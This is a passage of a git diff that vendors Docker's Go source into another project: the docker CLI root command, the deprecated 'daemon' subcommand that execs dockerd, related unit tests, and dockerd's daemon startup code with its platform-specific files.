Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestVolumeRemove(t *testing.T) { + expectedURL := "/volumes/volume_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.VolumeRemove(context.Background(), "volume_id", false) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go new file mode 100644 index 0000000000..65f9f37be2 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go @@ -0,0 +1,27 @@ +// +build !daemon + +package main + +import ( + "fmt" + "runtime" + "strings" + + "github.com/spf13/cobra" +) + +func newDaemonCommand() *cobra.Command { + return &cobra.Command{ + Use: "daemon", + Hidden: true, + RunE: func(cmd *cobra.Command, args []string) error { + return runDaemon() + }, + } +} + +func runDaemon() error { + return fmt.Errorf( + "`docker daemon` is not supported on %s. 
Please run `dockerd` directly", + strings.Title(runtime.GOOS)) +} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go new file mode 100644 index 0000000000..32032fe1b3 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go @@ -0,0 +1,17 @@ +// +build !daemon + +package main + +import ( + "testing" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestDaemonCommand(t *testing.T) { + cmd := newDaemonCommand() + cmd.SetArgs([]string{"--help"}) + err := cmd.Execute() + + assert.Error(t, err, "Please run `dockerd`") +} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go new file mode 100644 index 0000000000..26348a8843 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go @@ -0,0 +1,30 @@ +// +build daemon + +package main + +import ( + "testing" + + "github.com/docker/docker/pkg/testutil/assert" + "github.com/spf13/cobra" +) + +func stubRun(cmd *cobra.Command, args []string) error { + return nil +} + +func TestDaemonCommandHelp(t *testing.T) { + cmd := newDaemonCommand() + cmd.RunE = stubRun + cmd.SetArgs([]string{"--help"}) + err := cmd.Execute() + assert.NilError(t, err) +} + +func TestDaemonCommand(t *testing.T) { + cmd := newDaemonCommand() + cmd.RunE = stubRun + cmd.SetArgs([]string{"--containerd", "/foo"}) + err := cmd.Execute() + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go new file mode 100644 index 0000000000..f68d220c2f --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go @@ -0,0 +1,79 @@ +// +build daemon + +package main + +import ( + "fmt" + + "os" + "os/exec" + "path/filepath" + "syscall" + + "github.com/spf13/cobra" +) + +const daemonBinary = "dockerd" + +func newDaemonCommand() 
*cobra.Command { + cmd := &cobra.Command{ + Use: "daemon", + Hidden: true, + Args: cobra.ArbitraryArgs, + DisableFlagParsing: true, + RunE: func(cmd *cobra.Command, args []string) error { + return runDaemon() + }, + Deprecated: "and will be removed in Docker 1.16. Please run `dockerd` directly.", + } + cmd.SetHelpFunc(helpFunc) + return cmd +} + +// CmdDaemon execs dockerd with the same flags +func runDaemon() error { + // Use os.Args[1:] so that "global" args are passed to dockerd + return execDaemon(stripDaemonArg(os.Args[1:])) +} + +func execDaemon(args []string) error { + binaryPath, err := findDaemonBinary() + if err != nil { + return err + } + + return syscall.Exec( + binaryPath, + append([]string{daemonBinary}, args...), + os.Environ()) +} + +func helpFunc(cmd *cobra.Command, args []string) { + if err := execDaemon([]string{"--help"}); err != nil { + fmt.Fprintf(os.Stderr, "%s\n", err.Error()) + } +} + +// findDaemonBinary looks for the path to the dockerd binary starting with +// the directory of the current executable (if one exists) and followed by $PATH +func findDaemonBinary() (string, error) { + execDirname := filepath.Dir(os.Args[0]) + if execDirname != "" { + binaryPath := filepath.Join(execDirname, daemonBinary) + if _, err := os.Stat(binaryPath); err == nil { + return binaryPath, nil + } + } + + return exec.LookPath(daemonBinary) +} + +// stripDaemonArg removes the `daemon` argument from the list +func stripDaemonArg(args []string) []string { + for i, arg := range args { + if arg == "daemon" { + return append(args[:i], args[i+1:]...) 
+ } + } + return args +} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker.go b/vendor/github.com/docker/docker/cmd/docker/docker.go new file mode 100644 index 0000000000..d4847a90ee --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/docker.go @@ -0,0 +1,180 @@ +package main + +import ( + "errors" + "fmt" + "os" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/commands" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/term" + "github.com/docker/docker/utils" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +func newDockerCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := cliflags.NewClientOptions() + var flags *pflag.FlagSet + + cmd := &cobra.Command{ + Use: "docker [OPTIONS] COMMAND [ARG...]", + Short: "A self-sufficient runtime for containers", + SilenceUsage: true, + SilenceErrors: true, + TraverseChildren: true, + Args: noArgs, + RunE: func(cmd *cobra.Command, args []string) error { + if opts.Version { + showVersion() + return nil + } + return dockerCli.ShowHelp(cmd, args) + }, + PersistentPreRunE: func(cmd *cobra.Command, args []string) error { + // daemon command is special, we redirect directly to another binary + if cmd.Name() == "daemon" { + return nil + } + // flags must be the top-level command flags, not cmd.Flags() + opts.Common.SetDefaultOptions(flags) + dockerPreRun(opts) + if err := dockerCli.Initialize(opts); err != nil { + return err + } + return isSupported(cmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()) + }, + } + cli.SetupRootCommand(cmd) + + cmd.SetHelpFunc(func(ccmd *cobra.Command, args []string) { + if dockerCli.Client() == nil { // when using --help, PersistenPreRun is not called, so initialization is needed. 
+ // flags must be the top-level command flags, not cmd.Flags() + opts.Common.SetDefaultOptions(flags) + dockerPreRun(opts) + dockerCli.Initialize(opts) + } + + if err := isSupported(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()); err != nil { + ccmd.Println(err) + return + } + + hideUnsupportedFeatures(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()) + + if err := ccmd.Help(); err != nil { + ccmd.Println(err) + } + }) + + flags = cmd.Flags() + flags.BoolVarP(&opts.Version, "version", "v", false, "Print version information and quit") + flags.StringVar(&opts.ConfigDir, "config", cliconfig.ConfigDir(), "Location of client config files") + opts.Common.InstallFlags(flags) + + cmd.SetOutput(dockerCli.Out()) + cmd.AddCommand(newDaemonCommand()) + commands.AddCommands(cmd, dockerCli) + + return cmd +} + +func noArgs(cmd *cobra.Command, args []string) error { + if len(args) == 0 { + return nil + } + return fmt.Errorf( + "docker: '%s' is not a docker command.\nSee 'docker --help'", args[0]) +} + +func main() { + // Set terminal emulation based on platform as required. 
+ stdin, stdout, stderr := term.StdStreams() + logrus.SetOutput(stderr) + + dockerCli := command.NewDockerCli(stdin, stdout, stderr) + cmd := newDockerCommand(dockerCli) + + if err := cmd.Execute(); err != nil { + if sterr, ok := err.(cli.StatusError); ok { + if sterr.Status != "" { + fmt.Fprintln(stderr, sterr.Status) + } + // StatusError should only be used for errors, and all errors should + // have a non-zero exit status, so never exit with 0 + if sterr.StatusCode == 0 { + os.Exit(1) + } + os.Exit(sterr.StatusCode) + } + fmt.Fprintln(stderr, err) + os.Exit(1) + } +} + +func showVersion() { + fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit) +} + +func dockerPreRun(opts *cliflags.ClientOptions) { + cliflags.SetLogLevel(opts.Common.LogLevel) + + if opts.ConfigDir != "" { + cliconfig.SetConfigDir(opts.ConfigDir) + } + + if opts.Common.Debug { + utils.EnableDebug() + } +} + +func hideUnsupportedFeatures(cmd *cobra.Command, clientVersion string, hasExperimental bool) { + cmd.Flags().VisitAll(func(f *pflag.Flag) { + // hide experimental flags + if !hasExperimental { + if _, ok := f.Annotations["experimental"]; ok { + f.Hidden = true + } + } + + // hide flags not supported by the server + if flagVersion, ok := f.Annotations["version"]; ok && len(flagVersion) == 1 && versions.LessThan(clientVersion, flagVersion[0]) { + f.Hidden = true + } + + }) + + for _, subcmd := range cmd.Commands() { + // hide experimental subcommands + if !hasExperimental { + if _, ok := subcmd.Tags["experimental"]; ok { + subcmd.Hidden = true + } + } + + // hide subcommands not supported by the server + if subcmdVersion, ok := subcmd.Tags["version"]; ok && versions.LessThan(clientVersion, subcmdVersion) { + subcmd.Hidden = true + } + } +} + +func isSupported(cmd *cobra.Command, clientVersion string, hasExperimental bool) error { + if !hasExperimental { + if _, ok := cmd.Tags["experimental"]; ok { + return errors.New("only supported with experimental 
daemon") + } + } + + if cmdVersion, ok := cmd.Tags["version"]; ok && versions.LessThan(clientVersion, cmdVersion) { + return fmt.Errorf("only supported with daemon version >= %s", cmdVersion) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_test.go b/vendor/github.com/docker/docker/cmd/docker/docker_test.go new file mode 100644 index 0000000000..8738f6005d --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/docker_test.go @@ -0,0 +1,32 @@ +package main + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/docker/docker/utils" +) + +func TestClientDebugEnabled(t *testing.T) { + defer utils.DisableDebug() + + cmd := newDockerCommand(&command.DockerCli{}) + cmd.Flags().Set("debug", "true") + + err := cmd.PersistentPreRunE(cmd, []string{}) + assert.NilError(t, err) + assert.Equal(t, os.Getenv("DEBUG"), "1") + assert.Equal(t, logrus.GetLevel(), logrus.DebugLevel) +} + +func TestExitStatusForInvalidSubcommandWithHelpFlag(t *testing.T) { + discard := ioutil.Discard + cmd := newDockerCommand(command.NewDockerCli(os.Stdin, discard, discard)) + cmd.SetArgs([]string{"help", "invalid"}) + err := cmd.Execute() + assert.Error(t, err, "unknown help topic: invalid") +} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go new file mode 100644 index 0000000000..9bc507e20c --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go @@ -0,0 +1,18 @@ +package main + +import ( + "sync/atomic" + + _ "github.com/docker/docker/autogen/winresources/docker" +) + +//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll" + +var dummy uintptr + +func init() { + // Ensure that this import is not removed by the linker. 
This is used to + // ensure that shell32.dll is loaded by the system loader, preventing + // go#15286 from triggering on Nano Server TP5. + atomic.LoadUintptr(&dummy) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/README.md b/vendor/github.com/docker/docker/cmd/dockerd/README.md new file mode 100644 index 0000000000..a8c20b3549 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/README.md @@ -0,0 +1,3 @@ +docker.go contains Docker daemon's main function. + +This file provides first line CLI argument parsing and environment variable setting. diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go new file mode 100644 index 0000000000..2f099e0199 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go @@ -0,0 +1,524 @@ +package main + +import ( + "crypto/tls" + "fmt" + "io" + "os" + "path/filepath" + "runtime" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/uuid" + "github.com/docker/docker/api" + apiserver "github.com/docker/docker/api/server" + "github.com/docker/docker/api/server/middleware" + "github.com/docker/docker/api/server/router" + "github.com/docker/docker/api/server/router/build" + checkpointrouter "github.com/docker/docker/api/server/router/checkpoint" + "github.com/docker/docker/api/server/router/container" + "github.com/docker/docker/api/server/router/image" + "github.com/docker/docker/api/server/router/network" + pluginrouter "github.com/docker/docker/api/server/router/plugin" + swarmrouter "github.com/docker/docker/api/server/router/swarm" + systemrouter "github.com/docker/docker/api/server/router/system" + "github.com/docker/docker/api/server/router/volume" + "github.com/docker/docker/builder/dockerfile" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/daemon" + "github.com/docker/docker/daemon/cluster" + 
"github.com/docker/docker/daemon/logger" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/libcontainerd" + dopts "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/authorization" + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/pkg/listeners" + "github.com/docker/docker/pkg/pidfile" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/registry" + "github.com/docker/docker/runconfig" + "github.com/docker/docker/utils" + "github.com/docker/go-connections/tlsconfig" + "github.com/spf13/pflag" +) + +const ( + flagDaemonConfigFile = "config-file" +) + +// DaemonCli represents the daemon CLI. +type DaemonCli struct { + *daemon.Config + configFile *string + flags *pflag.FlagSet + + api *apiserver.Server + d *daemon.Daemon + authzMiddleware *authorization.Middleware // authzMiddleware enables to dynamically reload the authorization plugins +} + +// NewDaemonCli returns a daemon CLI +func NewDaemonCli() *DaemonCli { + return &DaemonCli{} +} + +func migrateKey(config *daemon.Config) (err error) { + // No migration necessary on Windows + if runtime.GOOS == "windows" { + return nil + } + + // Migrate trust key if exists at ~/.docker/key.json and owned by current user + oldPath := filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile) + newPath := filepath.Join(getDaemonConfDir(config.Root), cliflags.DefaultTrustKeyFile) + if _, statErr := os.Stat(newPath); os.IsNotExist(statErr) && currentUserIsOwner(oldPath) { + defer func() { + // Ensure old path is removed if no error occurred + if err == nil { + err = os.Remove(oldPath) + } else { + logrus.Warnf("Key migration failed, key file not removed at %s", oldPath) + os.Remove(newPath) + } + }() + + if err := system.MkdirAll(getDaemonConfDir(config.Root), os.FileMode(0644)); err != nil { + return fmt.Errorf("Unable to create daemon configuration directory: %s", err) + 
} + + newFile, err := os.OpenFile(newPath, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600) + if err != nil { + return fmt.Errorf("error creating key file %q: %s", newPath, err) + } + defer newFile.Close() + + oldFile, err := os.Open(oldPath) + if err != nil { + return fmt.Errorf("error opening key file %q: %s", oldPath, err) + } + defer oldFile.Close() + + if _, err := io.Copy(newFile, oldFile); err != nil { + return fmt.Errorf("error copying key: %s", err) + } + + logrus.Infof("Migrated key from %s to %s", oldPath, newPath) + } + + return nil +} + +func (cli *DaemonCli) start(opts daemonOptions) (err error) { + stopc := make(chan bool) + defer close(stopc) + + // warn from uuid package when running the daemon + uuid.Loggerf = logrus.Warnf + + opts.common.SetDefaultOptions(opts.flags) + + if cli.Config, err = loadDaemonCliConfig(opts); err != nil { + return err + } + cli.configFile = &opts.configFile + cli.flags = opts.flags + + if opts.common.TrustKey == "" { + opts.common.TrustKey = filepath.Join( + getDaemonConfDir(cli.Config.Root), + cliflags.DefaultTrustKeyFile) + } + + if cli.Config.Debug { + utils.EnableDebug() + } + + if cli.Config.Experimental { + logrus.Warn("Running experimental build") + } + + logrus.SetFormatter(&logrus.TextFormatter{ + TimestampFormat: jsonlog.RFC3339NanoFixed, + DisableColors: cli.Config.RawLogs, + }) + + if err := setDefaultUmask(); err != nil { + return fmt.Errorf("Failed to set umask: %v", err) + } + + if len(cli.LogConfig.Config) > 0 { + if err := logger.ValidateLogOpts(cli.LogConfig.Type, cli.LogConfig.Config); err != nil { + return fmt.Errorf("Failed to set log opts: %v", err) + } + } + + // Create the daemon root before we create ANY other files (PID, or migrate keys) + // to ensure the appropriate ACL is set (particularly relevant on Windows) + if err := daemon.CreateDaemonRoot(cli.Config); err != nil { + return err + } + + if cli.Pidfile != "" { + pf, err := pidfile.New(cli.Pidfile) + if err != nil { + return fmt.Errorf("Error 
starting daemon: %v", err) + } + defer func() { + if err := pf.Remove(); err != nil { + logrus.Error(err) + } + }() + } + + serverConfig := &apiserver.Config{ + Logging: true, + SocketGroup: cli.Config.SocketGroup, + Version: dockerversion.Version, + EnableCors: cli.Config.EnableCors, + CorsHeaders: cli.Config.CorsHeaders, + } + + if cli.Config.TLS { + tlsOptions := tlsconfig.Options{ + CAFile: cli.Config.CommonTLSOptions.CAFile, + CertFile: cli.Config.CommonTLSOptions.CertFile, + KeyFile: cli.Config.CommonTLSOptions.KeyFile, + } + + if cli.Config.TLSVerify { + // server requires and verifies client's certificate + tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert + } + tlsConfig, err := tlsconfig.Server(tlsOptions) + if err != nil { + return err + } + serverConfig.TLSConfig = tlsConfig + } + + if len(cli.Config.Hosts) == 0 { + cli.Config.Hosts = make([]string, 1) + } + + api := apiserver.New(serverConfig) + cli.api = api + + for i := 0; i < len(cli.Config.Hosts); i++ { + var err error + if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil { + return fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err) + } + + protoAddr := cli.Config.Hosts[i] + protoAddrParts := strings.SplitN(protoAddr, "://", 2) + if len(protoAddrParts) != 2 { + return fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr) + } + + proto := protoAddrParts[0] + addr := protoAddrParts[1] + + // It's a bad idea to bind to TCP without tlsverify. + if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) { + logrus.Warn("[!] DON'T BIND ON ANY IP ADDRESS WITHOUT setting -tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]") + } + ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig) + if err != nil { + return err + } + ls = wrapListeners(proto, ls) + // If we're binding to a TCP port, make sure that a container doesn't try to use it. 
+ if proto == "tcp" { + if err := allocateDaemonPort(addr); err != nil { + return err + } + } + logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr) + api.Accept(addr, ls...) + } + + if err := migrateKey(cli.Config); err != nil { + return err + } + + // FIXME: why is this down here instead of with the other TrustKey logic above? + cli.TrustKeyPath = opts.common.TrustKey + + registryService := registry.NewService(cli.Config.ServiceOptions) + containerdRemote, err := libcontainerd.New(cli.getLibcontainerdRoot(), cli.getPlatformRemoteOptions()...) + if err != nil { + return err + } + signal.Trap(func() { + cli.stop() + <-stopc // wait for daemonCli.start() to return + }) + + d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote) + if err != nil { + return fmt.Errorf("Error starting daemon: %v", err) + } + + if cli.Config.MetricsAddress != "" { + if !d.HasExperimental() { + return fmt.Errorf("metrics-addr is only supported when experimental is enabled") + } + if err := startMetricsServer(cli.Config.MetricsAddress); err != nil { + return err + } + } + + name, _ := os.Hostname() + + c, err := cluster.New(cluster.Config{ + Root: cli.Config.Root, + Name: name, + Backend: d, + NetworkSubnetsProvider: d, + DefaultAdvertiseAddr: cli.Config.SwarmDefaultAdvertiseAddr, + RuntimeRoot: cli.getSwarmRunRoot(), + }) + if err != nil { + logrus.Fatalf("Error creating cluster component: %v", err) + } + + // Restart all autostart containers which has a swarm endpoint + // and is not yet running now that we have successfully + // initialized the cluster. + d.RestartSwarmContainers() + + logrus.Info("Daemon has completed initialization") + + logrus.WithFields(logrus.Fields{ + "version": dockerversion.Version, + "commit": dockerversion.GitCommit, + "graphdriver": d.GraphDriverName(), + }).Info("Docker daemon") + + cli.d = d + + // initMiddlewares needs cli.d to be populated. Dont change this init order. 
+ if err := cli.initMiddlewares(api, serverConfig); err != nil { + logrus.Fatalf("Error creating middlewares: %v", err) + } + d.SetCluster(c) + initRouter(api, d, c) + + cli.setupConfigReloadTrap() + + // The serve API routine never exits unless an error occurs + // We need to start it as a goroutine and wait on it so + // daemon doesn't exit + serveAPIWait := make(chan error) + go api.Wait(serveAPIWait) + + // after the daemon is done setting up we can notify systemd api + notifySystem() + + // Daemon is fully initialized and handling API traffic + // Wait for serve API to complete + errAPI := <-serveAPIWait + c.Cleanup() + shutdownDaemon(d) + containerdRemote.Cleanup() + if errAPI != nil { + return fmt.Errorf("Shutting down due to ServeAPI error: %v", errAPI) + } + + return nil +} + +func (cli *DaemonCli) reloadConfig() { + reload := func(config *daemon.Config) { + + // Revalidate and reload the authorization plugins + if err := validateAuthzPlugins(config.AuthorizationPlugins, cli.d.PluginStore); err != nil { + logrus.Fatalf("Error validating authorization plugin: %v", err) + return + } + cli.authzMiddleware.SetPlugins(config.AuthorizationPlugins) + + if err := cli.d.Reload(config); err != nil { + logrus.Errorf("Error reconfiguring the daemon: %v", err) + return + } + + if config.IsValueSet("debug") { + debugEnabled := utils.IsDebugEnabled() + switch { + case debugEnabled && !config.Debug: // disable debug + utils.DisableDebug() + cli.api.DisableProfiler() + case config.Debug && !debugEnabled: // enable debug + utils.EnableDebug() + cli.api.EnableProfiler() + } + + } + } + + if err := daemon.ReloadConfiguration(*cli.configFile, cli.flags, reload); err != nil { + logrus.Error(err) + } +} + +func (cli *DaemonCli) stop() { + cli.api.Close() +} + +// shutdownDaemon just wraps daemon.Shutdown() to handle a timeout in case +// d.Shutdown() is waiting too long to kill container or worst it's +// blocked there +func shutdownDaemon(d *daemon.Daemon) { + shutdownTimeout 
:= d.ShutdownTimeout() + ch := make(chan struct{}) + go func() { + d.Shutdown() + close(ch) + }() + if shutdownTimeout < 0 { + <-ch + logrus.Debug("Clean shutdown succeeded") + return + } + select { + case <-ch: + logrus.Debug("Clean shutdown succeeded") + case <-time.After(time.Duration(shutdownTimeout) * time.Second): + logrus.Error("Force shutdown daemon") + } +} + +func loadDaemonCliConfig(opts daemonOptions) (*daemon.Config, error) { + config := opts.daemonConfig + flags := opts.flags + config.Debug = opts.common.Debug + config.Hosts = opts.common.Hosts + config.LogLevel = opts.common.LogLevel + config.TLS = opts.common.TLS + config.TLSVerify = opts.common.TLSVerify + config.CommonTLSOptions = daemon.CommonTLSOptions{} + + if opts.common.TLSOptions != nil { + config.CommonTLSOptions.CAFile = opts.common.TLSOptions.CAFile + config.CommonTLSOptions.CertFile = opts.common.TLSOptions.CertFile + config.CommonTLSOptions.KeyFile = opts.common.TLSOptions.KeyFile + } + + if opts.configFile != "" { + c, err := daemon.MergeDaemonConfigurations(config, flags, opts.configFile) + if err != nil { + if flags.Changed(flagDaemonConfigFile) || !os.IsNotExist(err) { + return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v\n", opts.configFile, err) + } + } + // the merged configuration can be nil if the config file didn't exist. + // leave the current configuration as it is if when that happens. + if c != nil { + config = c + } + } + + if err := daemon.ValidateConfiguration(config); err != nil { + return nil, err + } + + // Labels of the docker engine used to allow multiple values associated with the same key. + // This is deprecated in 1.13, and, be removed after 3 release cycles. + // The following will check the conflict of labels, and report a warning for deprecation. 
+ // + // TODO: After 3 release cycles (1.16) an error will be returned, and labels will be + // sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels): + // + // newLabels, err := daemon.GetConflictFreeLabels(config.Labels) + // if err != nil { + // return nil, err + // } + // config.Labels = newLabels + // + if _, err := daemon.GetConflictFreeLabels(config.Labels); err != nil { + logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err) + } + + // Regardless of whether the user sets it to true or false, if they + // specify TLSVerify at all then we need to turn on TLS + if config.IsValueSet(cliflags.FlagTLSVerify) { + config.TLS = true + } + + // ensure that the log level is the one set after merging configurations + cliflags.SetLogLevel(config.LogLevel) + + return config, nil +} + +func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) { + decoder := runconfig.ContainerDecoder{} + + routers := []router.Router{ + // we need to add the checkpoint router before the container router or the DELETE gets masked + checkpointrouter.NewRouter(d, decoder), + container.NewRouter(d, decoder), + image.NewRouter(d, decoder), + systemrouter.NewRouter(d, c), + volume.NewRouter(d), + build.NewRouter(dockerfile.NewBuildManager(d)), + swarmrouter.NewRouter(c), + pluginrouter.NewRouter(d.PluginManager()), + } + + if d.NetworkControllerEnabled() { + routers = append(routers, network.NewRouter(d, c)) + } + + if d.HasExperimental() { + for _, r := range routers { + for _, route := range r.Routes() { + if experimental, ok := route.(router.ExperimentalRoute); ok { + experimental.Enable() + } + } + } + } + + s.InitRouter(utils.IsDebugEnabled(), routers...) 
+} + +func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config) error { + v := cfg.Version + + exp := middleware.NewExperimentalMiddleware(cli.d.HasExperimental()) + s.UseMiddleware(exp) + + vm := middleware.NewVersionMiddleware(v, api.DefaultVersion, api.MinVersion) + s.UseMiddleware(vm) + + if cfg.EnableCors { + c := middleware.NewCORSMiddleware(cfg.CorsHeaders) + s.UseMiddleware(c) + } + + if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, cli.d.PluginStore); err != nil { + return fmt.Errorf("Error validating authorization plugin: %v", err) + } + cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, cli.d.PluginStore) + s.UseMiddleware(cli.authzMiddleware) + return nil +} + +// validates that the plugins requested with the --authorization-plugin flag are valid AuthzDriver +// plugins present on the host and available to the daemon +func validateAuthzPlugins(requestedPlugins []string, pg plugingetter.PluginGetter) error { + for _, reqPlugin := range requestedPlugins { + if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, plugingetter.LOOKUP); err != nil { + return err + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go new file mode 100644 index 0000000000..623aaf4b09 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go @@ -0,0 +1,5 @@ +package main + +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go new file mode 100644 index 0000000000..a556daa187 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go @@ -0,0 +1,11 @@ +// +build linux + +package main + +import systemdDaemon "github.com/coreos/go-systemd/daemon" + +// notifySystem 
sends a message to the host when the server is ready to be used +func notifySystem() { + // Tell the init daemon we are accepting requests + go systemdDaemon.SdNotify("READY=1") +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go new file mode 100644 index 0000000000..974ba16345 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go @@ -0,0 +1,85 @@ +// +build solaris + +package main + +import ( + "fmt" + "net" + "os" + "path/filepath" + "syscall" + + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/system" +) + +const defaultDaemonConfigFile = "" + +// currentUserIsOwner checks whether the current user is the owner of the given +// file. +func currentUserIsOwner(f string) bool { + if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil { + if int(fileInfo.UID()) == os.Getuid() { + return true + } + } + return false +} + +// setDefaultUmask sets the umask to 0022 to avoid problems +// caused by custom umask +func setDefaultUmask() error { + desiredUmask := 0022 + syscall.Umask(desiredUmask) + if umask := syscall.Umask(desiredUmask); umask != desiredUmask { + return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask) + } + + return nil +} + +func getDaemonConfDir(_ string) string { + return "/etc/docker" +} + +// setupConfigReloadTrap configures the USR2 signal to reload the configuration. 
+func (cli *DaemonCli) setupConfigReloadTrap() { +} + +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { +} + +func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { + opts := []libcontainerd.RemoteOption{} + if cli.Config.ContainerdAddr != "" { + opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr)) + } else { + opts = append(opts, libcontainerd.WithStartDaemon(true)) + } + return opts +} + +// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to +// store their state. +func (cli *DaemonCli) getLibcontainerdRoot() string { + return filepath.Join(cli.Config.ExecRoot, "libcontainerd") +} + +// getSwarmRunRoot gets the root directory for swarm to store runtime state +// For example, the control socket +func (cli *DaemonCli) getSwarmRunRoot() string { + return filepath.Join(cli.Config.ExecRoot, "swarm") +} + +func allocateDaemonPort(addr string) error { + return nil +} + +// notifyShutdown is called after the daemon shuts down but before the process exits. 
